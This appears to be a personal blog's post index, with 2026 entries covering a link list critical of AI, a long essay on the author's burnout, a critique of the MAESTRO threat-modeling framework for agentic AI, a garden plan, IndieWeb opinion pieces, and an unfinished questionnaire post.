shellsharks Posts

Beep, Boop, Sad 🤖 😞

Fri, 13 Mar 2026 10:07:00 -0400

“AI” is making me, and a lot of other people sad. This collection of links will give you an idea why…

⚠️ WARNING!: Click on these links at your own peril. They’re likely to make you even more sad.

AI-Linked Job Losses: Newly reported layoffs where AI is either explicitly cited or credibly blamed as a material factor.
Sam Altman Says Intelligence Will Be a Utility, and He’s Just the Man to Collect the Bills: Altman said, “We see a future where intelligence is a utility, like electricity or water, and people buy it from us on a meter.”
Silicon Valley is buzzing about this new idea: AI compute as compensation
In wake of outage, Amazon calls upon senior engineers to address issues created by ‘Gen-AI assisted changes,’ report claims — recent ‘high blast radius’ incidents stir up changes for code approval
HOW WE HACKED MCKINSEY’S AI PLATFORM
AI error jails innocent grandmother for months in North Dakota fraud case
The End of the Open Web
Palantir CEO Makes Shocking Confession on Disrupting Democratic Power: Palantir CEO Alex Karp thinks his AI technology will lessen the power of “highly educated, often female voters, who vote mostly Democrat” while increasing the power of working-class men.
AI and the Rise of Techno-Fascism in the United States
AI: The New Aesthetics of Fascism
The Colonization of Confidence: Why do LLMs exist? They exist to harm workers. They say it’s to “democratize creativity.” Bullshit. You don’t democratize creativity by automating the act of creation. You democratize it by funding arts education, by supporting libraries, by paying writers a living wage.
ChatGPT May Be Eroding Critical Thinking Skills, According to a New MIT Study
The Impact of Generative AI on Critical Thinking: Self-Reported Reductions in Cognitive Effort and Confidence Effects From a Survey of Knowledge Workers
AI Is Making Us Dumber. Shocker.
When Using AI Leads to “Brain Fry”
Online bot traffic will exceed human traffic by 2027, Cloudflare CEO says
Google Just Patented The End Of Your Website
GitHub hits CTRL-Z, decides it will train its AI with user data after all
Copilot Edited an Ad Into My PR

I’ll update this list as articles continue to pour in. Did AI make you sad today? I’m truly sorry about that 😕. Here’s a hug 🤗. Feel free to send me a note about it and I can add it to this wall-of-sad.

Pivot to AI is also a ~~great~~ upsetting compendium of such links.

Conflagration

Mon, 09 Mar 2026 14:13:00 -0400

I don’t think I really know when it happened—the “burnout”. It’s not something that happens all at once. Maybe you see it coming, you start to spot the signs. Or, if you’re like me, you don’t know it’s happened until months or years after being mired in the after-effects. I would slip… in… and out, of the conscious realization that I was indeed burned out. There were times I found myself very lucid, entirely aware of how burned out I had become. Through other spans of time I managed to disassociate entirely. How long was I there? I can’t honestly say. The entire lifecycle from burning out, to burned out, to realizing I was burned out, to recovery, is not a straight path, and not one that has some known, or widely-accepted timescale. Come to think of it, I really haven’t seen many accounts of severe burnout. I suppose that’s because those who experience it are likely too burned out to write about it. So, am I back? Hah! It’s not that simple unfortunately. But I am in a place where I feel that I can share my experience.

Notice: This is a particularly personal accounting of my real-life experience with burnout, and everything that comes with it.

Look, I’m not going to lie to you. I haven’t come here to say that I’ve unequivocally “recovered from burnout”. A nasty thing about burnout is that it isn’t some obvious, precipitous decline. It isn’t necessarily marked by some singular, triggering event. What causes burnout from one person to the next is never the exact same, and each of our paths can look wildly different and result in varying levels of burnout—the manifestations of which can also be quite variegated. Similarly, the path out is not straightforward. It is not an extrapolatable line upward and outward. This is an upswing for me, sure—writing this post. But I’ve been here before. I first thought about and started drafting this post nearly two years ago, around early May of 2024. This too would have been sometime well after I first realized I was “burnt out”—when I finally had enough energy to even give the notion of writing about it some thought. I can’t point to a day, or to a moment, or to a thing-that-happened and say “that’s when the burnout began”. However, I suspect that my own case of burnout began accelerating in early 2022, with “full burnout” finally happening in mid 2023 when my daughter was born, at which point I stepped away from it all on leave. I’ve been torched ever since.

How did it happen? Gah, I don’t know. There’s any number of things I can point to and say were contributing factors. The pandemic, too much work, not enough recognition at work, friendships lost, parenting stress, stress from the world at large, stretching myself too thin with side projects, the list goes on… We’re all conditioned to work, work, work. Reach higher, stretch into that role, stretch for those goals, get a better title, get more money, post our travel photos online, more, more, more! It’s just kinda… exhausting, y’know? In those 18 months from early 2022 to July 2023 I was pretty busy. I was in a demanding role at well-known big tech company, I had some side projects going on, I was publishing this blog + my podcast—all while doin’ the parenting thing. I pushed and pushed to do more and more, and did so in a way that was in hindsight, entirely aimless. Yes, I did a lot of things, but to what end? Were they in pursuit of something specific? Did those things make me happy? When my daughter was born I was just, tired. It was time to step away from the work and focus on those early months with a new baby. Eventually, I came back to work. But I didn’t really come back—not entirely. I had lost the drive and the motivation. Things that once interested me no longer did, and I’m not just talking about work stuff. I wasn’t as active on the blog, a lot of my hobbies just completely died, I was in battery-saving mode—just doing the bare minimum. I did what I had to at work, I ate, I went to the gym, I played with my kids and I slept. There were other hours in the day, but I’m not sure what I did with them.

I don’t want to misrepresent things here either. I didn’t spend my days doing “just the essentials”, keeping the lights on, and doing them well. No, no, no. In my haze, I’m not sure I did anything with the focus and enthusiasm that it deserved. My time spent at work was unfocused, often unproductive, and from my perspective, entirely meaningless and unfruitful. I got things done sure, but they didn’t seem to matter. No one said “good job”. I never felt accomplished. I could go days, or even a week or more without talking to a single person. I didn’t feel like I was learning anything. I felt that what I did there didn’t matter. That I didn’t matter. No one needed me and I had nothing to offer. While I stood alone and still, everyone else seemed busy, effective—happy. I would see proud messages of others in my team and across the company achieving promotions, or completing highly-visible, impactful projects. Sometimes I was jealous, but more often I felt nothing. I wasn’t inspired, I just continued on. At first it was just a month lost, or a quarter lost. But eventually it became this awful gap. A year or more where I’d been entirely stuck. Even if I could get moving again, look how far I’ve gotten behind.

My podcast fell to the wayside. My blog lie unupdated and dormant for months at a time, gathering cobwebs. I had aspired to a great many other things in the larger world of “shellsharks”, but I forgot about all of them. I announced >Shark Week in multiple years only to completely ignore it when the time came. I never conciously “gave up” on the blog… I just stopped. This wasn’t a purposeful attempt to reclaim time for work, or for parenting, or for my sanity. I was no longer in the drivers seat. I had simply, unpurposefully, disconnected. Sometimes I would remember it was there. I would think about writing something. Or I would catch up on a few things I wanted to update—breathing a little bit of life into the site. But for a long while, it didn’t amount to more than that. Folks who I came to know through my site, or through social media reached out to me. Wondering where I had gone. Wondering if I was OK. Eventually I saw the messages. I let them know that I was fine. Things were just busy. This was true. But it wasn’t the entire truth.

Even as a parent, and a full-time job-haver, I still have hobbies. Or I did. Through these darker days I still tried to go to the gym… but those sessions never got my full focus. I had projects in the yard, or around the house, but I never really got to them. If there’s anything that I managed to still be kinda “good” at, it was playing with and having fun with my kids. But even while doing that, I still often worried about work, never being able to fully be happy in the moment. Too often I sacrificed time I should have spent with my wife or family because I felt guilty about work. Then at work I felt circularly miserable about a perceived degraded home life. Vicious, some say.

That feeling of being behind on things, of feeling unfocused, of feeling unneeded, of feeling unimportant, bled into every corner of my life. I wasn’t just useless at work. I also started to see myself fail at home—and forget about my friendships, these had seemingly entirely disintegrated. I felt at this point, universally alone.

Burnout is one of those things that you try to shrug off. Everyone is burned out right? Everyone has any number of things stressing them out at any one time. Sure I may feel “burned out”, but it isn’t anything especially problematic! I found myself routinely ignoring or trivializing these feelings. I chalked them up to the routine stresses of the world, rather than fully appreciating the gravity of the state I was in. Because the difference between chronic burnout and run-of-the-mill stress is that with burnout you just can’t find your way back to a healthy “normal”. You stay unproductive and uneffective. It takes a more concerted effort to pull yourself out of the rut.

You see, I knew I was “burned out”, and looking back now, it’s easy to see I had become depressed too, thanks in part to the burnout. Some days I would manage to pop my head above the clouds with proclamations of how I was going to “get serious”, or “lock in”, or some other way of crawling out of this quagmire. But as some of my friends and family can attest, those words were either empty or simply did not provide adequate propulsion. I fell right back into the bad habits—that same fog. In some ways, I’m still trying to really understand what I want. I think having a clear idea of what you want is key. Only then can you try and reverse engineer the steps to get there, prioritize, and make time for everything. As it turns out, there’s just not enough time in the day for everything. Compromises, or full-on sacrifices have to be made. This is the reality.

So am I through it now? Am I OK? Am I no longer “burned out”. I don’t know. Probably not. I’ve been kinda here before to tell you the truth—“seeing the light”. I have clearer vision these days I’ll give you that. My hobbies have started to return, my outlook on work has improved dramatically, I’m using my time much more effectively. I think I’m happier these days. But it’s easy to slip back. I try to catch myself, to right the ship and to stay on course, but some days it seems the margin for error is just too thin. To lose a day in pursuit of everything is to knock myself off track indefinitely. But I remind myself that I don’t need to be perfect. I don’t need to operate at 100% efficiency. I need to understand my goals and work towards them, and not be discouraged when I falter. Success is a grind—a lot of little steps that in aggregate move us to a target destination. A step backwards, or a rest day doesn’t mean I’m back at the beginning.

Oh, and as if burnout alone wasn’t enough, there’s a lot of other career-related blights I (and I’m sure many readers of this post) experience—often manifesting into a devilish syzygy of occupational dilemmas. Let me talk about those for a minute too…

Demonology for the Professional World

There’s more to the fiendish nature of our “careers” than burnout alone. We the workers, tend to be plagued and posessed by a great many evils. Consider the list below a Lanterne of Light—traditionally a classification system for (actual) demons, but in this context, the hellions of the working world.

Burnout
Impostor Syndrome
Climbing the Ladder
Professional Vitality (i.e. boredom, finding interesting work)
Finding Meaning/Purpose
Maintaining Relevance & Skill Erosion
Isolation (e.g. remote work)

I’m sure there are more items to include on this list, but these are the ones I’ve observed most, at least in my own career history.

For now, this post will be limited to my experience with burnout alone. Perhaps one day I’ll expand it with tales of other such things, or maybe they’ll end up as separate posts sometime in the future. The fact is, everything in that list can contribute to burnout, and in turn, burnout and other things on that list can equally contribute to impostor syndrome. See where I’m going with this? That cursed list of professional afflictions can all feed into each other. So be weary!

Burnout

I told my story about burnout at the beginning of this post. Here, I want to be a bit more technical/scientific in terms of defining what burnout is, what causes it, how it manifests and how to mitigate or address it.

“Burnout is a syndrome conceptualized as resulting from chronic stress that has not been successfully managed. It is characterized by three dimensions: 1) feelings of energy depletion or exhaustion; 2) increased mental distance from one’s job, or feelings of negativism or cynicism related to one’s job; and 3) a sense of ineffectiveness and lack of accomplishment.”

Burnout is interesting, and scary. A lot of things can cause it, it can be hard to see it happening in real-time, and it’s even hard to tell if you’ve reached some form of final-stage “burn out”. Like, what does that even mean? How burnout can manifest itself, the symptoms themselves, can easily be attributed to other things, non-burnout related. How one experiences it, and what effects they experience can vary greatly from person to person. Similarly, treating, or recovering from burnout is not a known science. Some even suggest that you might never recover from burnout. So much about how you treat it, can probably be mapped to how it happened in the first place, which again is hard to understand as burnout tends to creep up on you slowly, over a great span of time.

Burnout Causes

There’s a lot of things that can trigger or ultimately contribute to “burnout”. Here’s a list… ^{1, 2}

Unclear mission & expectations
Lack of control
Opaque management
Resource starvation
Lack of agency / autonomy
Overwhelming scope
(Lack of) job security
Long hours
Dwindling pay
Lack of recognition or reward
Excessive workload
No sense of community, kinship or camaraderie
False urgency
Unfair treatment
Relentless change
Limited growth
No work / life balance
Micromanagement
Performance pressure
Toxicity
Lack of support
Bad communication
Monotonous work

There’s more to this list to be sure, but that’s a lot already.

Burnout Symptoms & Manifestations

Burnout manifests itself in a myriad of ways. Each person will experience it differently and at varying levels of severity. Some things you might experience are listed below… ³

Exhaustion
Activities, particularly social ones, drain you faster than usual
More venting / complaining
Hopelessness
Demotivation
Disengagement
Over-sleep
Feeling of never being inspired
Craving to work on projects but can’t
Stress
Depression
Laziness
Depersonalization (i.e. loss of sense of self)
Physical health issues (e.g. gastrointestinal, cognitive decline, heart palpitations, pain, etc…)
Guilt
Job switching
Procrastination

Treating and Mitigating Burnout

Probably the least understood thing about burnout is how to actually recover from or treat it. Sustained triggers are simply not easy to reverse and not easy to do a root cause analysis for. And even if you could identify everything that ultimately led to being burned out, is it realistic to expect that each of these things can be removed? How do we treat burnout while often having to continue being exposed to some subset of the same triggers that caused it in the first place?

One study attributed burnout, and in reverse, treating burnout to 6 main sources: workload, values, reward, control, fairness, and community. Another study suggested a framework known as “I Believe, I Belong, I Matter” as a path towards avoiding burnout. ^{4, 5}

In both cases, we are directly treating the initial triggers or feelings-caused by said triggers. I don’t know what works. I think these things all sound great, but what actually works—who knows.

I think time is important. Sometimes you just need to step away. But time alone isn’t enough. I for example spent quite a bit of time away. Sure, I wasn’t able to completely shield myself from the burnout triggers, so maybe that time away wasn’t “pure” in the recovery sense, but I feel like the time I had was as good as anyone can really expect. Afterall, if you’re a parent, or if you live in the real world, it’s just not overly practical to step away from your kids, or from your job, etc…

An important step is (and I mentioned this earlier) to think about and solidify what matters to you. What makes you happy? What do you really want to accomplish? Once you have this down, you can start to put together some semblance of a plan for getting there. Your goals need to be the composite of tasks that are realistic and actionable which amount to achieving said goals. You also need to give yourself room to fail, so you won’t be entirely discouraged if you aren’t perfect. Because you won’t be. You’ll never be—and thats OK.

The Way Forward

So what’s next? Well I’m still working on climbing out of the burnout hole. I have some ideas for how to kickstart myself professionally, and I am working on a more defined plan for the other things in my life. It’s not going to be a straight shot up and out, and burnout isn’t something you “defeat”. It’s something you manage. I’ve seen how it can manifest, I understand some of my triggers, and I know a few things that can help me treat and mitigate it. That’s enough for now.

Thanks for reading. Take care of yourself out there!

References & Resources

Using MAESTRO to Secure Agentic AI

Thu, 05 Mar 2026 15:12:00 -0500

I recently came across MAESTRO—billed as a “novel threat modeling framework designed specifically for the unique challenges of Agentic AI.” I fancy myself a bit of a collector of threat modeling frameworks, so of course I decided to dig into the writeup to see what innovative ideas it brings that are uniquely applicable to the world of agentic AI systems. TL;DR—I don’t think its approach, the actual “framework” for modeling, is particularly novel. Rather, what this whitepaper usefully introduces (if anything) is a multi-layered, AI-specific, attack/threat catalog.

Comparing existing frameworks

To illustrate the need for MAESTRO and distinguish it from other established threat modeling methodologies, the author (Ken Huang) first runs through a couple of the more well-known frameworks, enumerating the respective strengths, weaknesses and gaps related to AI. In this exercise, I think the paper fails to understand the modular quality of any given framework (more on this shortly *), but correctly highlights the ridgidity of any one framework’s “steps”, and the infeasibility of using them to-the-letter in a practical sense.

* For example, it’s called out that PASTA is “complex and resource intensive” which is not conducive to modern development. Absolutely, definitely agree here. But then it goes on to say that PASTA doesn’t specifically focus on AI vulnerabilities. Huh? PASTA (and frankly most other actual threat modeling frameworks—*cough* not STRIDE *cough*) give a lot of latitude in terms of attack generation (among other things)—i.e. there’s no reason you can’t use an AI-specific threat catalog (e.g. MITRE ATLAS) with PASTA.

As another example, the paper suggests that LINDDUN is inadequate for threat modeling AI systems because it is narrowly scoped to privacy-specific threats. Again, I think the paper fails to understand that LINDDUN has this specificity for a reason. It isn’t that LINDDUN isn’t good for AI systems, but rather LINDDUN isn’t a general-purpose (bring-your-own-threat-classification) threat modeling framework. If you are uniquely interested in privacy-related threats, LINDDUN is probably still a perfectly applicable methodology, even in the context of agentic AI systems.

As a final example, the paper suggests VAST is inadequate to evaluate AI systems because of some gap related to AI-specific risks. What? VAST is a very simple, and most notably, abstract framework, and as such allows for a lot of liberty in terms of the types of threats you can consider. Again, I think this speaks to a fundamental misunderstanding of the model (VAST) that MAESTRO is ultimately being compared with.

As an added note, there’s a lot of other models that this paper does not attempt to cover. Granted, these other models may not be as well-known, even if they could be more applicable in the AI context.

Getting into MAESTRO

Enough talk about other models, let’s get into what MAESTRO really is. To understand MAESTRO, let’s take a look at the framework’s stated principles and its methodology for modeling.

MAESTRO’s Principles

MAESTRO’s principles are meant to be tailor-made for conducting practical security assessments against agentic AI systems. They are also meant to be unique and differentiating with respect to other “competing” methodologies. These principles are listed below…

Extended Security Categories: Expanding traditional categories like STRIDE, PASTA, and LINDDUN with AI-specific considerations.
Multi-Agent and Environment Focus: Explicitly considering the interactions between agents and their environment.
Layered Security: Security isn’t a single layer, but a property that must be built into each layer of the agentic architecture.
AI-Specific Threats: Addressing threats arising from AI, especially adversarial ML and autonomy-related risks.
Risk-Based Approach: Prioritizing threats based on likelihood and impact within the agent’s context.
Continuous Monitoring and Adaptation: Ongoing monitoring, threat intelligence, and model updates to address the evolving nature of AI and threats.

After a cursory review, these principles seem perfectly adequate for assessing agentic AI systems—no comment there. But I don’t think these principles are particularly novel juxtaposed with other existing frameworks. As I covered earlier, many methodologies provide the space to plug-in an attack/threat catalog of your choosing. Sure, threat classification models like STRIDE or threat modeling frameworks like LINDDUN that have more rigid threat categories exist, but most methodologies allow you to generate threats with much greater latitude. Understanding system layers and environmental context is nothing unique either. This just sounds like the classic step of application decomposition, i.e. understanding the data flow, the use cases, the actors, mitigating controls, etc… The remaining three principles just cover threat generation, risk analysis and revisiting the model. So… really nothing new to add.

To be clear, these aren’t bad principles. It’s just not groundbreaking stuff.

The Approach

Speaking of nothing groundbreaking, let’s analyze MAESTRO’s “step-by-step approach”, i.e. the actual methodology. The steps are listed below…

System Decomposition: Break down the system into components according to the seven-layer architecture. Define agent capabilities, goals, and interactions.
Layer-Specific Threat Modeling: Use layer-specific threat landscapes to identify threats. Tailor the identified threats to the specifics of your system.
Cross-Layer Threat Identification: Analyze interactions between layers to identify cross-layer threats. Consider how vulnerabilities in one layer could impact others.
Risk Assessment: Assess likelihood and impact of each threat using the risk measurement and risk matrix, prioritize threats based on the results.
Mitigation Planning: Develop a plan to address prioritized threats. Implement layer-specific, cross-layer, and AI-specific mitigations.
Implementation and Monitoring: Implement mitigations. Continuously monitor for new threats and update the threat model as the system evolves.

Seem familiar? That’s because it is. Application decomposition, threat generation, risk assessment, risk treatments and validation would describe a lot of other models. The only difference here is that the threat generation is focused on AI-specific threats across these defined layers… but other models (i.e. PASTA) would also accommodate for this. So in short, the “model” is not novel. If there’s value here (and I think there could be), it’s in the layered threat catalog. Let’s get to that…

7-Layer Reference Architecture, i.e. the Attack Catalog

What I do find interesting and useful from the MAESTRO writeup is the layer-by-layer breakdown of AI-related threats. I won’t regurgitate them here so I would encourage you to read through the writeup to see the listing/breakdown of attacks.

Though other AI-specific threat catalogs exist (and will likely continue to be developed) (e.g. ATLAS), I do like the way MAESTRO breaks it down by layers.

Resources

Garden Plan 2026

Thu, 19 Feb 2026 00:15:00 -0500

Howdy y’all 🧑‍🌾! Spring is just around the corner and as such, I’ve started thinking about what I’m goin’ to do gardenin’-wise in 2026. Last year was the first time I’ve ever tried to grow anything, so I wasn’t particularly ambitious. I grew some cherokee purple heirloom tomatoes which turned out amazing, and I harvested some blueberries from a bush that was already in the yard from before I bought the house. That’s it though. This year I’m planning on expanding the garden to additional zones and planting a wider variety of things. Exciting!

The Plan

Last year I used this tiny 3ft-by-8ft (ish) area to plant a few tomatoes. This year, I’m looking to expand my usable garden space into a few other zones to accommodate more stuff. But what should I grow? My decision making process here came down to, A. What can I grow in my zone? (7B), B. what do I and my family like to eat, and C. what isn’t terribly difficult to grow given my space parameters and general skill?

So here’s the list of things I came up with that I am going to try and bring to life… 🌱

🍅 Heirloom Tomatoes (e.g. probably those Cherokee Purples again): These were delicious and made for great BLTs and by-the-slice-eatin’.
🍒 Cherry Tomatoes: These will be great in a salad or dunked in hummus. If I’m lucky, I might even be able to get my kids to try some.
🥒 Cucumbers: I’ve always wanted to grow cucumbers—just like my grandma did when I was growin’ up. I love to dip ‘em in ranch.
🫛 Brown crowder peas (i.e. “cowpeas” / “field peas”): Now here’s a crop I always enjoyed while dining at my grandmas house, but never thought I could grow here. Well it turns out maybe I can! I’m not 100% sure this is the exact variety she used to grow but it looks pretty similar so I plan on giving it a shot.
🍐 Pear Tree: I’m not 100% sure on the variety yet, but pear trees are supposed to grow pretty well in this zone and my kids LOVE them.
🍑 Peach Tree: Same as the pear tree. ⬆️
🫐 Blueberry: I already have one blueberry plant on the side of the house, but I have space for another and have been told that a second variety can help with cross-pollination. One problem though, is I’m not sure of the variety I already have! Oh well, what’re the chances I choose the exact same one??
🫑 Pepper: I might try to sneak a red/green pepper plant in somewhere (as requested by my wife).
🌻 Sunflower: Unrelated to the back yard, but I want to plant a sunflower in the front of the house. We had one when we first moved in and loved it! Time to bring it back.

Alright, I’ve got a handle on what I want to grow and I have taken some measurements for the areas I plan to grow this stuff in. Doing a little research I found the following recommendations for how much space to give each of these crops…

Cucumbers: Plant them 8-10 inches apart and in rows 3-5 feet apart.
Cherry Tomatoes: Plant them 2-3 feet apart.
Heirloom Tomatoes: Plant them 3-4 feet apart and 4-5 feet inbetween rows.
Field Peas: Plant them 3-6 inches apart and with rows 2-3 feet apart.
Fruit Trees (e.g. pear/peach): Plant them with a ~10 foot radius.

So with all this together, here’s a concept of how things would look…

In this diagram I consider there to be 4 distinct zones…

Zone 1: In front of my screened porch is a ~14.5ft-by-6ft area that I plan on making into a net-new garden space. In here I’d like to try planting the cucumbers, cherry tomatoes, field peas and peppers.
Zone 2: In front of the sunroom, where I planted the heirloom tomatoes last year, I plan on doing the same thing this year.
Zone 3: Where I currently have my lone blueberry bush (and fledgling raspberry plant), I’d like to drop another blueberry bush. (This is on the side of the house)
Zone 4: Further back in the yard (away from the house) is a sunnier, and more spacious area that I’d like to see if I could get some larger fruit trees goin’.

There ya have it! A plan is born.

Plan Execution

They say things are easier said than done, and in this case—that is 100% true. Yeah sure, I grew some delicious tomatoes last year, but that was nothin’ compared to growing all this stuff I want to do this year 😬. There’s a lot I need to do! I need to acquire the plants, probably grow some of them from seedlings (which requires infrastructure and know-how I don’t yet possess), dig up or otherwise build new garden areas from scratch, and do plenty of research along the way. Phew!

Here’s some random resources I’ve collected that I suspect might help me this year…

Peach Growing Guide
Home Gardening Class from the LSU College of Agriculture

So yeah, there’s a lot I need to learn, figure out and then ultimately do. I’ll probably get into more of that in future posts. For now though, I’ve got what kinda looks like a plan. Wish me luck!

The Human Web

Fri, 13 Feb 2026 01:23:00 -0500

The year is 2026. AI has hollowed out what little humanity remained within the enshittified husks of the big tech slums us mortals digitally reside. Our privacy has been laid waste, our identities subjugated, our voices silenced, and our (digital) world sterilized. But this need not be our fate. A web revolution has begun my friends. What was once the nascent spark of a long lost web, is now a flourishing of digital gardens—personal sanctuaries on the net. It is there that once again people are free—to express themselves, to find others, to share their thoughts—without the fear of algorithmic oppression, corporate censorship and mass-assimilation. This revolution is known by many names—the “IndieWeb”, the “small web”, the “old web”—whatever you call it, it’s a more human web. A better web. Will you join us?

Flavors of A More Human Web

Remember personal blogs? Well they’re still a thing. These sites, unique in their design, and owned / operated by real human people, are part of what I like to call the “human web”. This is an all-inclusive term for characterizing all things “IndieWeb”, “Personal Web”, “Old Web”, “Small Web”, etc… Some (me) use these terms interchangeably, while others are more adamant about what type of site is included in what form of “web”. Generally, I’ve seen each of these terms differentiated as follows…

“IndieWeb”: See here.
“Personal Web”: Sites operated by single people in individualistic, idiosyncratic ways.¹
“Old Web”: Sites with a visual style resembling the web 1.0 era. ²
“Small Web”: Sites that are simple in nature, accessible to a wide variety of web clients, don’t require JavaScript or other modern web bloat, etc… ³

Ultimately, I don’t think it’s important to fixate on these various subsets—the larger movement is what matters. Together, they represent a diverse and unfiltered showcase of thought, of individuality, of tradition, of technology, and of the human experience. Made for real people, by real people.

Note: In practice, I consider and talk about my site as part of the “IndieWeb”, and I use that term generally to mean sites that are part of the larger human web. I understand others think of the IndieWeb as something different, or nuanced, and that’s fine.

The IndieWeb

What is the IndieWeb? Its origins can be traced to indieweb.org. It was here that I developed my own formative understanding of this more human web and its various communities and ideals.

Indieweb.org defines the IndieWeb as a people-focused alternative to the “corporate web”—a community of independent and personal websites rooted in 3 foundational principles.

Your content is yours, and in your control.
You are in control of your site and your content. You can post what you want, in any format you want.
Your site is connected. Your content can be distributed anywhere else on the web and your site can facilitate replies, likes, and other status messages.

The first two principles I’m totally on board with. Where indieweb.org loses me though is on this mandate to be “connected”. This expectation that your site must contain social-like functionality (e.g. comments, likes) and it must syndicate its content to other places (i.e. social media sites) is bizarre. Your site shouldn’t need to be social. It doesn’t need to share its content elsewhere (though I do highly recommend having an RSS feed).

I think I know where this insistence on connectedness orginates from though. Indieweb.org states that their movement is to create an alternative to the “corporate web”. You see, in the days of yore, your presence on the web was a blog/site. Since the advent of MySpace, through today, your identity and presence on the web has been relegated to https://BIGTECHSOCIALPLATFORM.COM/YOURNAMEHERE. Effectively, we moved away from blogs and personal sites as the de facto standard for ones identity on the web to these big, centralized social media platforms. You are now who Facebook says you are, or LinkedIn, or Twitter, etc…

Indieweb.org’s response to this is to shift not only one’s canonical presence on the web from big social back to personal sites, but also to lessen or entirely eliminates one’s reliance on these big social platforms to do, well, “social” things. Why else would they mandate that your blog (of all things) be capable of engaging with other sites via likes, and “status messages”—traditional social media-type behaviors.

In Indieweb.org’s world view, “indie-“ means independent. Your entire presence—your identity, your content, your connections, your network—can be entirely self-contained on your site. They’re taking the power, and I mean all the power, back from big social. But I think it’s a step too far.

I like to think of “indie-“ differently. For me it means individualism. Your site doesn’t need to be entirely independent—a monolith of functionality with every feature baked into it all at once. It certainly doesn’t need to collect random likes and showcase them on every article. Rather, your site needs to be something that is simply, distinctively you. Your content, your voice, your aesthetic, on a domain that is unique to you.

Let’s further dig into what it takes (in my opinion) to be part of the IndieWeb.

Being Part of the IndieWeb

I made a comment recently about how Medium (the blogging platform) was antithetical to (my own understanding of) IndieWeb ideals. I gave no further reasoning at the time. The argument made in reply to my comment was that Medium allows you export your posts and email lists and that it has an API that allows you to get stuff. The point was also made that Medium had no ads or user tracking. It was a thoughtful reply and it made me think, what is the “IndieWeb”? What makes a site “part of the IndieWeb”?

IndieWeb Principles

For me, to be a “part of the IndieWeb”, or whatever you want to call it, your site must meet just three criteria.

Your site is hosted at a domain you own.
You own (and have access to all of) your content.
The site is about you–—your writing, your content. You are free to personalize the site’s design as you see fit.

That’s it!

Is Medium Part of the IndieWeb?

So this brings me back to the discussion around Medium, and whether a Medium blog is part of the “IndieWeb”, or IndieWebby in general.

Let’s judge Medium using my three simple criteria.

✅ Domain Ownership: Yes! Medium allows you to bring your own domain. Though I will say, it requires you to be a paid Medium member and theres some other small limitations.
🤷‍♂️ Data Ownership: Does Medium allow you to own your content? Kind of? Hopefully? Your writing and personal data are stored on Medium servers and accessible via their CMS. You have the ability to export your account data including your stories. But here’s where things get murky for me. That’s great that Medium allows this. But like… what if they decided one day to not allow that. What if on that day, you hadn’t taken a recent export? It’s worth considering the potential risks and how you can ensure you truly own your content and ensure your site’s overall sovereignty.
❌ Individual Expression: Fail. Medium (and platforms like it) severely limit your options for customization & personalization. Yes you can publish your writing there, but your site is otherwise canned—a sterile clone of every other site and page across the entire platform. True may it be that the words on your site can be uniquely yours, but they will still come from the same white background, black font, serif text that you know and ~~love~~ are-bored-of.

Look, if what matters to you most is getting your words out, in plain text, then Medium might be a good choice for you. Medium has lots of benefits in terms of discoverability, monetization, etc… But there are no digital gardens on Medium.

Parting Thoughts

I’m not trying to be elitist, or non-inclusive, or self-aggrandizing. My word on this is certainly not gospel. Afterall, I’m just some random on the Internet with a blog. I’m not saying Medium is a bad platform, nor is it evil. I’m not saying you shouldn’t use it. Like with any choice of platform, or technology, there are always tradeoffs. Where you invest your time and how you build your identity on the web matters though, and I think there are risks to using Medium if what you want is to truly own your space on the web and use it how you see fit—if what you want is to be part of the “IndieWeb”. What Medium does offer, among many things, is a very easy way to get started. You can bring a domain, and just start writing—and at least for now, you’re free to migrate that content elsewhere when you please. This is still much preferred to the alternative—don’t give all your content, and don’t leave your identity on the web in the hands of LinkedIn, or Facebook, or Twitter, or any of these centralized big tech platforms. If it can help, let Medium be a stepping stone to something that can truly be uniquely, and perpetually you.

Intersecting Interests

Sat, 07 Feb 2026 13:05:00 -0500

This month’s IndieWeb Carnival is Intersecting Interests. After giving it some thought, I’m not sure I have a particularly outstanding pair of intersecting interests, but there’s plenty of li’l junctions to speak of. Let’s see what I’ve got…

Travel x Food: An obvious one sure, but I do really love to travel and I think my favorite part has always been exploring the local cuisine. Some standouts from my travels have got to be belgians cooking various stews in their legendary beers, Tiroler Gröstl from Austria and Costa Rican casado. 🤤
Playing x Watching Basketball: I watch a number of different sports, but the only one I really play is basketball. I get plenty of ideas of how I might improve or tweak my game by watching what the pros are up to. Doin’ my best to copy that is!
Hiking x Frisbee Golf: These two go hand-in-hand. Especially if you’re not very good at frisbee golf and end up throwing it deep into the woods every time. Turns out I do a lot of extra hiking for every round of disc golf I play! 😅
Apple x Retro Gaming: I don’t do much modern gaming these days, but I still like to play some of the classics from time to time. Retro emulators on the iPhone/iPad are a great way to quickly enjoy some of these titles on the go. (This one in particular)
Blogging x ANYTHING!: Last but not least, there’s my blogging interest! Turns out you can (and should) blog about literally anything. So that’s what I do. I blog about all sorts of different things—infosec, technology, apple, gaming, travel, fediverse, music, sci-fi, gardening and much more!

That’s it! Thanks for reading.

100 Webmaster Questions

Tue, 03 Feb 2026 11:08:00 -0500

Here’s a blogging challenge inspired by theresmiling. “100 webmaster questions”, let’s go!

1. Please introduce yourself.

I am shellsharks and shellsharks means me! (IRL, folks call me Mike.)

2. How long have you been making websites?

Since about May 2019.

3. And what got you into the hobby?

I really wanted to write this post and this post. Though my true passion for blogging and site-keeping as it is today was born when I first discovered the IndieWeb.

4. What kind of website are you most interested in?

There’s a lot of sites I like. I generally adore personal / IndieWeb sites and anything that shares interesting / educational or infosec / cybersecurity content. I enjoy all sites that are particularly unique. A better question may be what sites do I not like…. Anything with AI-generated content, anything plastered with ads, most of the “corporate”-web, anything malicious and any of these other annoying sites.

5. What’s your workflow? Do you plan your websites out thoroughly or do you come up with the design as you go along?

I don’t have a lot of websites outside of this one. I started in 2019 without much of a plan. I knew only that I had a few ideas for posts to write and the rest would come thereafter. If I were to make a new site today, I would have a lot of lessons learned that I could apply to how I would build said site.

As it pertains to how this blog is currently set up / ran, here’s my site’s overall architecture & my blogging methodology.

6. Please link to your biggest inspirations.

Here’s some of my favorite site designs, and everyone else I have to thank for how my site has turned out thus far.

7. What’s your favourite part about making websites?

Great question! So hard to choose. I’ll name a few. To start, here’s some of my favorite things I’ve built for the site. But I’d say my favorite part about actually making the website has been turning it into a digital home, a place I really just like to spend time in and click around. Secondly, I’ve really enjoyed my site as a place that has helped, educated and inspired others across the ‘net.

8. And the thing you struggle with the most?

Probably these two things…

Finding the time and motivation to work-on / write-for the site.
Getting around some of the technical limitations of static site generators.

9. Do you keep the same layout on all of your pages? Or do you use different ones?

